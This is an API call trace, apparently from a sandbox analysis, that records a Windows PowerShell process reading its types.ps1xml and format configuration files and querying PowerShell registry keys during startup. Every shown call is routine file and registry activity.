	[0564.910] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d2f0 | out: lpFileInformation=0x22d2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0564.910] SetErrorMode (uMode=0x1) returned 0x1
	[0564.912] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0564.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.912] CoTaskMemFree (pv=0x38e960) 
	[0564.916] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0564.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.916] CoTaskMemFree (pv=0x38e960) 
	[0564.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.921] SetErrorMode (uMode=0x1) returned 0x1
	[0564.922] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0564.922] GetFileType (hFile=0x328) returned 0x1
	[0564.922] SetErrorMode (uMode=0x1) returned 0x1
	[0564.922] GetFileType (hFile=0x328) returned 0x1
	[0564.923] ReadFile (in: hFile=0x328, lpBuffer=0x2c813e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2c813e0*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0564.925] ReadFile (in: hFile=0x328, lpBuffer=0x2c813e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2c813e0*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0564.934] ReadFile (in: hFile=0x328, lpBuffer=0x2c813e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2c813e0*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0564.935] ReadFile (in: hFile=0x328, lpBuffer=0x2c813e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2c813e0*, lpNumberOfBytesRead=0x22d228*=0xcf3, lpOverlapped=0x0) returned 1
	[0564.935] ReadFile (in: hFile=0x328, lpBuffer=0x2c8083b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2c8083b*, lpNumberOfBytesRead=0x22d228*=0x0, lpOverlapped=0x0) returned 1
	[0564.935] ReadFile (in: hFile=0x328, lpBuffer=0x2c813e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2c813e0*, lpNumberOfBytesRead=0x22d228*=0x0, lpOverlapped=0x0) returned 1
	[0564.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.938] SetErrorMode (uMode=0x1) returned 0x1
	[0564.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d1a0 | out: lpFileInformation=0x22d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0564.938] SetErrorMode (uMode=0x1) returned 0x1
	[0564.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.939] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d288 | out: phkResult=0x22d288*=0x328) returned 0x0
	[0564.939] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d20c, lpData=0x0, lpcbData=0x22d208*=0x0 | out: lpType=0x22d20c*=0x1, lpData=0x0, lpcbData=0x22d208*=0x56) returned 0x0
	[0564.939] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c9c70
	[0564.939] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d1dc, lpData=0x1b7c9c70, lpcbData=0x22d1d8*=0x56 | out: lpType=0x22d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d1d8*=0x56) returned 0x0
	[0564.939] CoTaskMemFree (pv=0x1b7c9c70) 
	[0564.939] RegCloseKey (hKey=0x328) returned 0x0
	[0564.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0567.517] VirtualQuery (in: lpAddress=0x22bf70, lpBuffer=0x22ce30, dwLength=0x30 | out: lpBuffer=0x22ce30*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0567.529] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0567.529] GetFileType (hFile=0x324) returned 0x1
	[0567.529] SetErrorMode (uMode=0x1) returned 0x1
	[0567.529] GetFileType (hFile=0x324) returned 0x1
	[0567.529] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.530] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.530] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.530] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.530] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.530] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.531] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.531] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.531] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.533] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.533] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.534] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.534] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.534] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.535] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.535] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.535] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.548] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.549] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.549] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.549] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.550] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.550] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.550] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.551] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.551] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.552] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.552] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.552] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.553] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.553] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.554] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.554] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.560] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.560] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.561] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.561] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.561] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0567.562] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0569.091] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0569.092] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1000, lpOverlapped=0x0) returned 1
	[0569.092] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x1b4, lpOverlapped=0x0) returned 1
	[0569.092] ReadFile (in: hFile=0x324, lpBuffer=0x2b52180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d228, lpOverlapped=0x0 | out: lpBuffer=0x2b52180*, lpNumberOfBytesRead=0x22d228*=0x0, lpOverlapped=0x0) returned 1
	[0569.093] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d288 | out: phkResult=0x22d288*=0x324) returned 0x0
	[0569.093] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d20c, lpData=0x0, lpcbData=0x22d208*=0x0 | out: lpType=0x22d20c*=0x1, lpData=0x0, lpcbData=0x22d208*=0x56) returned 0x0
	[0569.093] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c9e30
	[0569.093] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d1dc, lpData=0x1b7c9e30, lpcbData=0x22d1d8*=0x56 | out: lpType=0x22d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d1d8*=0x56) returned 0x0
	[0569.093] CoTaskMemFree (pv=0x1b7c9e30) 
	[0569.093] RegCloseKey (hKey=0x324) returned 0x0
	[0569.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0569.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0575.342] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0575.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.342] CoTaskMemFree (pv=0x38e960) 
	[0576.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d428 | out: phkResult=0x22d428*=0x2f8) returned 0x0
	[0576.837] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x22d43c, lpData=0x0, lpcbData=0x22d438*=0x0 | out: lpType=0x22d43c*=0x1, lpData=0x0, lpcbData=0x22d438*=0x74) returned 0x0
	[0576.837] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x22d3ac, lpData=0x0, lpcbData=0x22d3a8*=0x0 | out: lpType=0x22d3ac*=0x1, lpData=0x0, lpcbData=0x22d3a8*=0x74) returned 0x0
	[0576.837] CoTaskMemAlloc (cb=0x78) returned 0x362720
	[0576.837] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x22d37c, lpData=0x362720, lpcbData=0x22d378*=0x74 | out: lpType=0x22d37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22d378*=0x74) returned 0x0
	[0576.837] CoTaskMemFree (pv=0x362720) 
	[0576.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0576.838] SetErrorMode (uMode=0x1) returned 0x1
	[0576.838] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22d300 | out: lpFileInformation=0x22d300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0576.838] SetErrorMode (uMode=0x1) returned 0x1
	[0576.839] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0576.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.839] CoTaskMemFree (pv=0x38e960) 
	[0576.847] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0576.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.848] CoTaskMemFree (pv=0x38e960) 
	[0576.848] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0576.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.848] CoTaskMemFree (pv=0x38e960) 
	[0576.848] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0576.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.849] CoTaskMemFree (pv=0x38e960) 
	[0576.849] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0576.849] GetFileType (hFile=0x2fc) returned 0x1
	[0576.849] SetErrorMode (uMode=0x1) returned 0x1
	[0576.849] GetFileType (hFile=0x2fc) returned 0x1
	[0576.850] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0576.851] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0576.852] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0576.852] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0576.853] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0576.853] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0576.853] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x9e2, lpOverlapped=0x0) returned 1
	[0576.853] ReadFile (in: hFile=0x2fc, lpBuffer=0x31f973a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31f973a*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0576.854] ReadFile (in: hFile=0x2fc, lpBuffer=0x31fa1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31fa1f0*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
